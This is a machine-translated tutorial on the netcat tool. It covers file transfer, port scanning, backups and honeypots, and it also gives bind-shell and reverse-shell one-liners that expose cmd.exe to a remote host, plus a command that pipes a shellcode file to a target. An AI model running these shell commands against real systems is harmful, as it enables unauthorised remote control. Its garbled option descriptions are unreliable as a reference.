"Share" the use of NC under Linux

Today, strolling around the drink from, I saw a post about LinuxThe next NC Life to implement file transfer, LearningLearned a bit.
Send side:
Cat Test. txt | Nc-l-P 6666
Or Nc-l-P 6666 < test.txtSome versions are not available on-p
"Listening on port 6666, Waiting for Connection" (set the Send side IP to 10.20.133.152)
Receiving end:
NC 10.20.133.152 6666 > Test1.txt
As above, you can transfer the file Test.txt from the sender to the receiving end, save as Test1.txt

Want to connect to somewhere: NC [-options] hostname port[s] [ports] ...
Bind port Waiting for connection: Nc-l-P Port [-options] [hostname] [port]

Syntax: NC [-hlnruz][-g< Gateway ...>][-g< number of points >][-i< delay seconds >][-o< output file >][-p< communication port >][-s< Source Address >][-v ...] [-w< timeout number of seconds;] [Host name] [Communication port ...]
Additional note: The implementation of this directive can set the parameters of the router.
Parameters
-g< Gateway > Set Router Hop communication gateway, the most lost oh can be set to 8.
-g< number of pointers > set source route-to-point, with a number of multiples of 4.
-H online Help.
-i< delay seconds > Set time interval for transmitting information and scanning communication ports.
-L Use the monitor mode to control incoming data.
-N uses the IP address directly, not through the domain name server.
-o< output File > Specify the name of the file, and transfer the data transferred to the file in 16 Loadline to save.
-p< Communication port > Set the communication port used by the local host.
-R chaos Specifies the communication port between the local and the remote host.
-s< Source location > Set the IP address of the local host to send the packet.
-U uses the UDP transport protocol.
-V Displays the instruction execution process.
-w< Timeout seconds > Set the time to wait for the connection.
-Z uses 0 in/out mode and is only used when scanning communication ports.

In addition, NC commands are also available for port scanning:
Nc-v-z-w2 10.20.133.152 1-14000
The 1~14000 TCP port on the 10.20.133.152 host can be scanned;

Nc-u-v-z-w2 10.20.133.152 1-14000
You can scan the 1~14000 UDP port on the 10.20.133.152 host.

NC is a very good network detection tool, the following is the detailed use.
' Nc.exe-h ' can see how each parameter is used.
Basic format: NC [-options] hostname port [ports] ...
Nc-l-P port [options] [hostname] [port]
-D Background mode
-e Prog program redirection, once connected, execute [Dangerous!!]
-G Gateway source-routing Hop Point, up to 8
-G num source-routing pointer:4, 8, 12, ...
-H Help Information
-I secs delay interval
-L listening mode for inbound connections
-L continues to listen after the connection is closed
-n Specifies the IP address of the number and cannot be used hostname
-O file record 16-binary transfer
-P port Local port number
-R random Local and remote ports
-S addr Local Source Address
-T using telnet interactive mode
-U UDP mode
-V Verbose output--with two-V for more detailed content
-W secs timeout time
-Z turns the input and output off-for scanning
The representation of a port can be written as a range format for m-n.
1) Connect to the remote host
Format: NC-NVV 192.168.x.x 80
Explanation: Connecting to the TCP80 port of 192.168.x.x
2) Listen to the local host
Format: nc-l-P 80
Explanation: Listen to the TCP80 port of this machine
3) Scan remote host
Format: nc-nvv-w2-z 192.168.x.x 80-445
Explanation: Scan all ports of 192.168.x.x TCP80 to TCP445
4) remote host binding shell, example:
Format: nc-l-P 5354-t-e C:\winnt\system32\cmd.exe
Explanation: The Cmdshell of the remote host is bound to the TCP5354 port of the remote host
5) remote host bind shell and reverse connection, example:
Format: NC-T-e c:\winnt\system32\cmd.exe 192.168.x.x 5354
Explanation: Bind the remote host's Cmdshell and reverse connect to the 192.168.x.x TCP5354 port
These are some of the most basic uses (in fact, there are a lot of NC usage,
When the Mate Pipeline command "|" With the redirect command "<", ">" and so on command function more powerful ... ）。
6) for attack applications, examples:
Format 1:type.exe C:\EXPLOIT.TXT|NC-NVV 192.168.x.x 80
Format 2:NC-NVV 192.168.x.x < C:\exploit.txt
Explanation: Connect to the 192.168.x.x 80 port and send the ' c:\exploit.txt ' content in its pipeline (two formats do have the same effect, which is similar: P)
Attached: ' C:\exploit.txt ' for shellcode, etc.
7) for honeypot use [1], Example:
Format: nc-l-P 80
Explanation: Use '-l ' (note L is uppercase) to continuously listen to a port until CTRL + C
8) for honeypot use [2], example:
Format: nc-l-p > C:\log.txt
Explanation: Use '-l ' can continuously listen to a port, until CTRL + C, and output the results to ' c:\log.txt ', if the ' > '
Change to ' >> ' to append log
Attached: ' C:\log.txt ' for logs, etc.
9) for honeypot use [3], Example:
Format 1:nc-l-P < C:\honeypot.txt
Format 2:type.exe c:\honeypot.txt|nc-l-P 80
Explanation: Use '-l ' can keep listening to a port until Ctrl + C, and ' send ' the contents of ' C:\honeypot.txt ' into its pipeline!
10) Backup Archive
The folder of a machine/data backup to the backup.tgz of Host B
SOURCE Host: Tar czf-work|nc-l-c-p 1234
Destination Host: NC 192.168.0.1 1234 >a.tgz
Or
A:TAR-ZCF data|nc-l-P 4444
B:NC a 4444 >backup.tgz
After the pass CTRL + C interrupt connection, so that a host will not generate files directly to the backup.tgz, the disadvantage is not know when to pass, hey

"Share" the use of NC under Linux